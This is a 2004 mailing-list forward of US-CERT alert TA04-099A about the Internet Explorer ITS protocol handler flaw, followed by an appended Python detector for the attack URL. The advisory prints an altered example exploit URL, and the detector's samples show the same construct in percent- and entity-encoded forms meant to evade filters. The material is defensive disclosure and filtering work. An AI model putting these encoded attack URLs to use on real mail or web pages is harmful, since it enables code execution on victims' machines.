[thelist] Fwd: US-CERT Technical Cyber Security Alert TA04-099A -- Vulnerability in Internet Explorer ITS Protocol Handler
Anthony Baratta
anthony at baratta.com
Thu Apr 8 17:36:04 CDT 2004
FYI...
New IE Security Hole - no patch currently available, review the RegHack
explained below. Watch out for HTML formatted emails and strange web sites.
Big Note: CERT is saying this might be exploitable via a non-IE browser!!
>From: CERT Advisory <cert-advisory at cert.org>
>To: cert-advisory at cert.org
>Organization: CERT(R) Coordination Center - +1 412-268-7090
>Subject: US-CERT Technical Cyber Security Alert TA04-099A -- Vulnerability
>in Internet Explorer ITS Protocol Handler
>
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>Vulnerability in Internet Explorer ITS Protocol Handler
>
> Original release date: April 8, 2004
> Last revised: --
> Source: US-CERT
>
>Systems Affected
>
> * Microsoft Windows systems running Internet Explorer
>
>Overview
>
> A cross-domain scripting vulnerability in Microsoft Internet Explorer
> (IE) could allow an attacker to execute arbitrary code with the
> privileges of the user running IE. The attacker could also read and
> manipulate data on web sites in other domains or zones.
>
>I. Description
>
> There is a cross-domain scripting vulnerability in the way ITS
> protocol handlers determine the security domain of an HTML component
> stored in a Compiled HTML Help (CHM) file. The HTML Help system
> "...uses the underlying components of Microsoft Internet Explorer to
> display help content. It supports HTML, ActiveX, Java, [and] scripting
> languages (JScript, and Microsoft Visual Basic Scripting Edition)."
> CHM files use the InfoTech Storage (ITS) format to store components
> such as HTML files, graphic files, and ActiveX objects. IE provides
> several protocol handlers that can access ITS files and individual CHM
> components: its:, ms-its:, ms-itss:, and mk:@MSITStore:. IE also has
> the ability to access parts of MIME Encapsulation of Aggregate HTML
> Documents (MHTML) using the mhtml: protocol handler.
>
> When IE references an inaccessible or non-existent MHTML file using
> the ITS and mhtml: protocols, the ITS protocol handlers can access a
> CHM file from an alternate source. IE incorrectly treats the CHM file
> as if it were in the same domain as the unavailable MHTML file. Using
> a specially crafted URL, an attacker can cause arbitrary script in a
> CHM file to be executed in a different domain, violating the
> cross-domain security model.
>
> Any programs that use the WebBrowser ActiveX control or the IE HTML
> rendering engine (MSHTML) may be affected by this vulnerability.
> Internet Explorer, Outlook, and Outlook Express are all examples of
> such programs. Any programs, including other web browsers, that use
> the IE protocol handlers (URL monikers) could function as attack
> vectors. Also, due to the way that IE determines MIME types, HTML and
> CHM files may not have the expected file name extensions (.htm/.html
> and .chm respectively).
>
> NOTE: Using an alternate web browser may not mitigate this
> vulnerability. It may be possible for a web browser other than IE on a
> Windows system to invoke IE to handle ITS protocol URLs.
>
> US-CERT is tracking this issue as VU#323070. This reference number
> corresponds to CVE candidate CAN-2004-0380.
>
>II. Impact
>
> By convincing a victim to view an HTML document such as a web page or
> HTML email message, an attacker could execute script in a different
> security domain than the one containing the attacker's document. By
> causing script to be run in the Local Machine Zone, the attacker could
> execute arbitrary code with the privileges of the user running IE. The
> attacker could also read or modify data in other web sites (including
> reading cookies or content and modifying or creating content).
>
> Publicly available exploit code exists for this vulnerability. US-CERT
> has monitored incident reports that indicate that this vulnerability
> is being exploited. The Ibiza trojan, variants of W32/Bugbear, and
> BloodHound.Exploit.6 are some examples of malicious code that exploit
> this vulnerability. It is important to note that any arbitrary
> executable payload could be delivered via this vulnerability, and
> different anti-virus vendors may identify malicious code with
> different names.
>
> A malicious web site or email message may contain HTML similar to the
> following:
>
> ms-_its:mhtml:file://C:\nosuchfile_mht!http://www.example.com//exploit_chm::exploit_html
>
> (This URL is intentionally modified to avoid detection by
> anti-virus software.)
>
> In this example, HTML and script in exploit.html will be executed in
> the security context of the Local Machine Zone. It is common practice
> for exploit.html to either contain or download an executable payload
> such as a backdoor, trojan horse, virus, bot, or other malicious code.
>
> Note that it is possible to encode a URL in an attempt to bypass HTTP
> content inspection or anti-virus software.
>
>III. Solution
>
> Currently, there is no complete solution for this vulnerability. Until
> a patch is available, consider the workarounds listed below.
>
> Disable ITS protocol handlers
>
> Disabling ITS protocol handlers appears to prevent exploitation of
> this vulnerability. Delete or rename the following registry keys:
>
> HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-itss,its,mk}
>
> Disabling these protocol handlers will significantly reduce the
> functionality of the Windows Help system and may have other unintended
> consequences. Plan to undo these changes after patches have been
> tested and installed.
>
> Follow good Internet security practices
>
> These recommended security practices will help to reduce exposure to
> attacks and mitigate the impact of cross-domain vulnerabilities.
>
> * Disable Active scripting and ActiveX controls
>
> NOTE: Disabling Active scripting and ActiveX controls will not
> prevent the exploitation of this vulnerability.
>
> Disabling Active scripting and ActiveX controls in the Internet
> and Local Machine Zones may stop certain types of attacks and will
> prevent exploitation of different cross-domain vulnerabilities.
>
> Disable Active scripting and ActiveX controls in any zones used to
> read HTML email.
>
> Disabling Active scripting and ActiveX controls in the Local
> Machine Zone will prevent malicious code that requires Active
> scripting and ActiveX controls from running. Changing these
> settings may reduce the functionality of scripts, applets, Windows
> components, or other applications. See Microsoft Knowledge Base
> Article 833633 for detailed information about security settings
> for the Local Machine Zone. Note that Service Pack 2 for Windows
> XP includes these changes.
>
> * Do not follow unsolicited links
>
> Do not click on unsolicited URLs received in email, instant
> messages, web forums, or Internet relay chat (IRC) channels.
>
> * Maintain updated anti-virus software
>
> Anti-virus software with updated virus definitions may identify
> and prevent some exploit attempts. Variations of exploits or
> attack vectors may not be detected. Do not rely solely on
> anti-virus software to defend against this vulnerability. More
> information about viruses and anti-virus vendors is available on
> the US-CERT Computer Virus Resources page.
>
>Appendix B. References
>
> * Vulnerability Note VU#323070 -
> <http://www.kb.cert.org/vuls/id/323070>
>
> * US-CERT Computer Virus Resources -
> <http://www.us-cert.gov/other_sources/viruses.html>
>
> * CVE CAN-2004-0380 -
> <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0380>
>
> * Introduction to URL Security Zones -
> <http://msdn.microsoft.com/workshop/security/szone/overview/overview.asp>
>
> * About Cross-Frame Scripting and Security -
> <http://msdn.microsoft.com/workshop/author/om/xframe_scripting_security.asp>
>
> * MIME Type Determination in Internet Explorer -
> <http://msdn.microsoft.com/workshop/networking/moniker/overview/appendix_a.asp>
>
> * URL Monikers -
> <http://msdn.microsoft.com/workshop/networking/moniker/monikers.asp>
>
> * Asynchronous Pluggable Protocols -
> <http://msdn.microsoft.com/workshop/networking/pluggable/pluggable.asp>
>
> * Microsoft HTML Help 1.4 SDK -
> <http://msdn.microsoft.com/library/en-us/htmlhelp/html/vsconHH1Start.asp>
>
> * Microsoft Knowledge Base Article 182569 -
> <http://support.microsoft.com/default.aspx?scid=182569>
>
> * Microsoft Knowledge Base Article 174360 -
> <http://support.microsoft.com/default.aspx?scid=174360>
>
> * Microsoft Knowledge Base Article 833633 -
> <http://support.microsoft.com/default.aspx?scid=833633>
>
> * Windows XP Service Pack 2 Technical Preview -
> <http://www.microsoft.com/technet/prodtechnol/winxppro/sp2preview.mspx>
>
> * AusCERT Update AU-2004.007 - <http://www.auscert.org.au/3990>
> _________________________________________________________________
>
> This vulnerability was reported by Thor Larholm.
> _________________________________________________________________
>
> Feedback can be directed to the author: Art Manion.
> _________________________________________________________________
>
> Copyright 2004 Carnegie Mellon University.
>
> Terms of use:
>
> <http://www.us-cert.gov/legal.html>
>
> Revision History
>
> April 8, 2004: Initial release
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.2.1 (GNU/Linux)
>
>iD8DBQFAdbqQXlvNRxAkFWARAtfuAKD0NGSDWbtITNqXKmZk7qcbJD/h2QCfRlU/
>sWme3VvhRbvk9KjNUNyTsbY=
>=kL0G
>-----END PGP SIGNATURE-----
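The advisory's Impact section gives the shape of the attack URL (an ITS scheme, then mhtml:, an unavailable MHTML file, "!", the remote CHM and "::" the HTML component inside it) and warns that the URL may be encoded to slip past content inspection or anti-virus. The following is an added example, not code from the advisory or from Anthony's message: a small Python detector that undoes HTML character references and percent-encoding before matching that shape, so that a mail gateway or proxy filter does not miss an encoded variant. The sample documents, host names and file names in it are constructed for illustration; the advisory's own example URL was deliberately altered, so the detector matches the general construct rather than those exact characters.

```python
"""Detector for the ITS/mhtml cross-domain URL construct described in
TA04-099A.  Added example, not code from the US-CERT advisory; the sample
documents below are constructed for illustration."""
from __future__ import annotations

import html
import re
from urllib.parse import unquote

# Protocol handlers named in the advisory.  The lookbehind keeps a bare 'its'
# from matching inside another word.  'mhtml:' must follow the scheme: a
# plain ms-its: link to a local help file is not the cross-domain construct.
_ITS_MHTML = re.compile(
    r"(?<![\w-])(?P<scheme>its|ms-its|ms-itss|mk:@msitstore):mhtml:"
    r"(?P<mhtml>[^!\s\"'<>]+)!"          # unavailable / non-existent MHTML file
    r"(?P<chm>[^\s\"'<>]+?)::"           # CHM fetched from the alternate source
    r"(?P<component>[^\s\"'<>]+)",       # HTML component inside the CHM
    re.IGNORECASE,
)


def normalize(text: str, rounds: int = 3) -> str:
    """Undo the layered encodings an attacker may apply to hide the URL from
    content inspection (HTML character references, percent-encoding), repeating
    until the text stops changing or `rounds` is exhausted."""
    for _ in range(rounds):
        decoded = unquote(html.unescape(text))
        if decoded == text:
            break
        text = decoded
    return text


def find_its_mhtml(text: str) -> list[dict]:
    """Return every ITS/mhtml cross-domain URL found after normalisation."""
    hits = []
    for m in _ITS_MHTML.finditer(normalize(text)):
        hits.append({
            "scheme": m.group("scheme").lower(),
            "mhtml": m.group("mhtml"),
            "chm": m.group("chm"),
            "component": m.group("component"),
            "url": m.group(0),
        })
    return hits


def scan(documents: dict[str, str]) -> dict[str, list[dict]]:
    """Map each document name to the cross-domain URLs it contains."""
    return {name: find_its_mhtml(body) for name, body in documents.items()}


# Constructed samples (not real malware): the same construct in three encodings,
# plus a benign local help link that uses an ITS scheme without mhtml:.
SAMPLES = {
    "plain": r'<object data="ms-its:mhtml:file://C:\nosuchfile.mht!http://www.example.com/exploit.chm::exploit.html">',
    "percent": '<iframe src="ms-its:mhtml:file%3A%2F%2FC%3A%5Cnosuchfile.mht!http%3A%2F%2Fwww.example.com%2Fexploit.chm%3A%3Aexploit.html">',
    "entities": r'<a href="&#109;&#115;&#45;&#105;&#116;&#115;:mhtml:file://C:\x.mht!http://www.example.com/x.chm::x.html">',
    "benign_help": r'<a href="ms-its:C:\WINDOWS\Help\ntart.chm::/ntart.htm">Help</a>',
}


if __name__ == "__main__":
    for name, hits in scan(SAMPLES).items():
        verdict = "BLOCK" if hits else "pass"
        print(f"{name:12s} {verdict}", *[h["url"] for h in hits])
```

The decode-then-match step is the part worth keeping: a signature on the literal string "ms-its:mhtml:" misses the percent-encoded and entity-encoded forms above, which IE decodes before dispatching. The benign sample shows why the match is anchored on "mhtml:" rather than on the ITS scheme alone; a stricter policy that blocks every ITS scheme in web or mail content is also defensible and is what the advisory's registry workaround amounts to on the client. Whatever the filter catches, it does not replace disabling the handlers or applying the patch once it ships.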